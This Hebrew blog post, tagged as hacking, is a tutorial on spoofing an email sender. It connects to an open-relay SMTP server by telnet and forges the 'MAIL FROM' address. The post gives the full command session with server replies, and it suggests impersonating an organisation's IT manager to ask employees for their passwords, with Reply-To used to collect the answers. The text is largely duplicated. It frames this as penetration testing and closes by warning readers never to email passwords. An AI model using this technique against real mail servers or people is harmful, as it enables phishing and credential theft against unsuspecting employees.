התחזות באימייל
Posted by epotex | Posted in Hacking , IT , MAIL RELAY , SMTP , SPOFING , TELNET
הטריק הזה כל כך ישן שיש לו זקן לבן ארוך, אבל יכול להיות שהוא יהיה יעיל למישהו אז בבקשה.
ביום יום אנחנו רגילים לשלוח מיילים באמצעות תוכנות כמו outlook, incredimail, thunderbird וכו' ישנה עוד דרך פשוטה לשלוח מייל ולבצע בו מניפולציות כגון מי שלח את המייל ותוכנו, ובכך לבדוק גם את ההגדרות על שרת הדואר SMTP האם הוא מאפשר לכל מי שרוצה לשלוח מייל דרכו? (Mail Relay) ובנוסף להתחכם קצת עם הנדסה חברתית.
אנחנו נתחבר לשרת הדואר באמצעות הפקודה "telnet" ונכתיב לו מה לשלוח וממי לשלוח נניח שאנחנו רוצים לקבל סיסמא של משתמש בארגון בו אנו מבצעים בדיקת חדירות, אנחנו נברר מי הם האנשים שאחראים על מחלקת הIT בארגון ומה כתובות המייל שלהם, לאחר מכן שיהיו לנו את הפרטים המלאים נוכל לשלוח מייל בשם אותם אנשי הIT שמבקש מהם את הסיסמא בטענה כזאת או אחרת (משאיר לכם מקום לקצת יצירתיות)
הנה סדר הפקודות לביצוע משורת הפקודה :
המייל נכנס ל"תור" השליחה של שרת הדואר ללא בקשת הזדהות וכדומה....
ניתן לראות ששלחנו מייל כביכול בשם ITMANAGER אל someuser
הסבר על הפקודות:
telnet בפורט 25 יחבר אותנו אל השרת
HELO יפתח את הדיאלוג עם השרת שבאמצעותו נשלח המייל
MAIL FROM ממי המייל ישלח, כאן אנחנו מזייפים את האימייל של השולח
RCPT TO אל מי המייל ישלח
DATA תוכן ההודעה
ENTER .EMTER סיום ההודעה ושליחתה
QUIT לצאת
ניתן להוסיף את הפקודה
Reply-To: על מנת שהשולח יחזיר את המייל אל הכתובת שאתם רוצים
במידה והשרת לא מוגדר כ - Mail Relay נקבל הודעה דומה לזו....
550 5.7.1 Relaying not allowed. Please use SMTP Authentication. For assistance:
לעולם אל תמסרו את הסיסמאות שלכם במייל!
ביום יום אנחנו רגילים לשלוח מיילים באמצעות תוכנות כמו outlook, incredimail, thunderbird וכו' ישנה עוד דרך פשוטה לשלוח מייל ולבצע בו מניפולציות כגון מי שלח את המייל ותוכנו, ובכך לבדוק גם את ההגדרות על שרת הדואר SMTP האם הוא מאפשר לכל מי שרוצה לשלוח מייל דרכו? (Mail Relay) ובנוסף להתחכם קצת עם הנדסה חברתית.
אנחנו נתחבר לשרת הדואר באמצעות הפקודה "telnet" ונכתיב לו מה לשלוח וממי לשלוח נניח שאנחנו רוצים לקבל סיסמא של משתמש בארגון בו אנו מבצעים בדיקת חדירות, אנחנו נברר מי הם האנשים שאחראים על מחלקת הIT בארגון ומה כתובות המייל שלהם, לאחר מכן שיהיו לנו את הפרטים המלאים נוכל לשלוח מייל בשם אותם אנשי הIT שמבקש מהם את הסיסמא בטענה כזאת או אחרת (משאיר לכם מקום לקצת יצירתיות)
הנה סדר הפקודות לביצוע משורת הפקודה :
C:\>telnet mail.somedomain.com 25
220 mail.somedomain.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready
at Mon, 22 Mar 2010 14:32:52 -0500
HELO
250 mail.somedomain.com Hello [domain ip]
MAIL FROM: ITMANAGER@somedomain.com
ITMANAGER@somedomain.com Sender OK 250 2.1.0
RCPT TO: someuser@somedomain.com
250 2.1.5 : someuser@somedomain.com
DATA
354 Start mail input; end with .
Hi someuser, this is ITMANAGER ,
Blabla bla blabla
Enter . Enter
QUIT
250 2.6.0 Queued mail for delivery
220 mail.somedomain.com Microsoft ESMTP MAIL Service, Version: 6.0.3790.3959 ready
at Mon, 22 Mar 2010 14:32:52 -0500
HELO
250 mail.somedomain.com Hello [domain ip]
MAIL FROM: ITMANAGER@somedomain.com
ITMANAGER@somedomain.com Sender OK 250 2.1.0
RCPT TO: someuser@somedomain.com
250 2.1.5 : someuser@somedomain.com
DATA
354 Start mail input; end with .
Hi someuser, this is ITMANAGER ,
Blabla bla blabla
Enter . Enter
QUIT
250 2.6.0 Queued mail for delivery
המייל נכנס ל"תור" השליחה של שרת הדואר ללא בקשת הזדהות וכדומה....
ניתן לראות ששלחנו מייל כביכול בשם ITMANAGER אל someuser
הסבר על הפקודות:
telnet בפורט 25 יחבר אותנו אל השרת
HELO יפתח את הדיאלוג עם השרת שבאמצעותו נשלח המייל
MAIL FROM ממי המייל ישלח, כאן אנחנו מזייפים את האימייל של השולח
RCPT TO אל מי המייל ישלח
DATA תוכן ההודעה
ENTER .EMTER סיום ההודעה ושליחתה
QUIT לצאת
ניתן להוסיף את הפקודה
Reply-To: על מנת שהשולח יחזיר את המייל אל הכתובת שאתם רוצים
במידה והשרת לא מוגדר כ - Mail Relay נקבל הודעה דומה לזו....
550 5.7.1 Relaying not allowed. Please use SMTP Authentication. For assistance:
לעולם אל תמסרו את הסיסמאות שלכם במייל!
רשומות
